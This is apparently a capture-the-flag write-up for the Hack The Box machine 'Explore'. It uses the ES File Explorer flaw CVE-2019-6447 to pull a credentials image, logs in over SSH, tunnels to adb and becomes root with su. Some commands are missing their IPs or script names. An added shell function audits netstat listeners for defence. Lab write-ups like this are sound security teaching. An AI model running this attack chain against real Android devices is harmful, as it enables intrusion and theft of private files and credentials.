


As usual, let's start with nmap:

nmap -sV -Pn -p-

I googled the following:

  • port 5555 android --> adb (Android Debug Bridge)

  • port 5977 android --> found out there is an Android vulnerability in ES File Explorer - CVE-2019-6447. Basically, this vulnerability allows attackers on the same network to execute applications and read files on the Android device!

From your attacking machine do the following:

Go to exploit database

Click on Search EDB

and type 2019-6447 in the CVE field

Click on the exploit

Download the exploit

Go to your Downloads folder:

cd Downloads

Let's try to run this exploit using:


Looks like we need to add a command followed by the IP. If we go back to the exploit on the exploit-db website, it tells us we can use the command listPics to list all the pictures on the Android device, so let's try that:

python3 listPics

Looks like there is an interesting picture called creds.jpg

Let's try to get this file using getFile:

python3 getFile /storage/emulated/0/DCIM/creds.jpg

The file has been downloaded on our machine as out.dat, let's check it out:

When we open the file we see the following:

Looks like a password for username kristi:


We can see from the nmap that port 2222 is open, which is ssh. So let's try to ssh using these credentials:

ssh kristi@ -p 2222

Type yes and press Enter

Enter the password we just found


We are in!



cd sdcard

cat user.txt


Congratulations! You got the user flag!

cd ..

Let's find out on which port the android is listening by typing:

netstat -tulpn | grep LISTEN

We can see port 5555 is listening.

Port forwarding

What is local port forwarding:

Local port forwarding is configured using the -L option:

    ssh -L 5555:machine2:5555 machine1

This opens an SSH connection to machine1 and forwards any connection made to port 5555 on your local machine, through machine1, to port 5555 on machine2.

For our case let's use it and type:

    ssh -L 5555:localhost:5555 kristi@IP -p 2222

This opens an SSH connection to the HTB target machine (Explore) and forwards any connection made to port 5555 on my localhost (VM) to port 5555 on the target's own localhost.

We know that our target (htb machine) is listening on port 5555 (netstat told us)

Open a new command prompt on your VM

ssh -L 5555:localhost:5555 kristi@ -p 2222

Enter the password we found earlier
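
The netstat check and the tunnel above show why a listener on the adb port matters even when it cannot be reached directly from outside. As an added example (not part of the original write-up), this shell function audits `netstat -tuln`-style output for listeners on the adb and SSH ports this page names and reports how each one is bound; the function names, the default watch list and the sample lines are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original write-up): audit listening TCP sockets.
# Reads `netstat -tuln`-style lines on stdin and prints, for each watched port,
# "<port> <label> <exposure>". Watch list defaults to ports named on this page.

audit_listeners() {
    awk -v watch_list="${1:-5555=adb 2222=ssh}" '
    BEGIN {
        # Build a port -> label map from the "port=label" pairs.
        n = split(watch_list, pairs, " ")
        for (i = 1; i <= n; i++) {
            split(pairs[i], kv, "=")
            watch[kv[1]] = kv[2]
        }
    }
    # Only TCP sockets in LISTEN state matter here.
    $1 ~ /^tcp/ && $6 == "LISTEN" {
        # The port follows the last colon (IPv6 addresses contain colons too).
        m = split($4, parts, ":")
        port = parts[m]
        addr = substr($4, 1, length($4) - length(port) - 1)
        gsub(/^\[|\]$/, "", addr)          # ss-style "[::]" becomes "::"
        if (!(port in watch)) next
        if (addr ~ /^127\./ || addr == "::1" || addr ~ /^::ffff:127\./)
            exposure = "loopback-only"
        else if (addr == "0.0.0.0" || addr == "::" || addr == "*")
            exposure = "all-interfaces"
        else
            exposure = "specific-address:" addr
        print port, watch[port], exposure
    }'
}

# Constructed sample input, not captured from the target in this write-up.
sample_netstat() {
    cat <<'EOF'
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:5555          0.0.0.0:*               LISTEN
tcp6       0      0 :::2222                 :::*                    LISTEN
tcp6       0      0 ::ffff:10.0.0.5:8080    :::*                    LISTEN
udp        0      0 0.0.0.0:5555            0.0.0.0:*
EOF
}

sample_netstat | audit_listeners
```

A `loopback-only` result for adb still needs attention: as the tunnel above shows, any account that can log in over SSH can forward that port.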



ADB (Android Debug Bridge) is a command-line tool that allows you to communicate with an Android device. It is used mainly by developers to install or debug apps, and it also comes with a Unix shell that can be used to run several commands on the device.

An Android device emulator is just a virtual device that runs on your computer and allows you to develop and test your Android app without using a physical Android device.

Open a new command prompt on your VM

sudo apt install adb

Press Y to continue

sudo apt-get update
sudo apt install adb

press Y to continue.

This time it worked, we have installed adb successfully.

adb devices

adb connect localhost:5555

adb devices

adb shell
adb localhost shell
adb -s localhost shell


The su command switches to the super user – or root user


We are now root!


cd data

cat root.txt


Congratulations! You got the root flag!
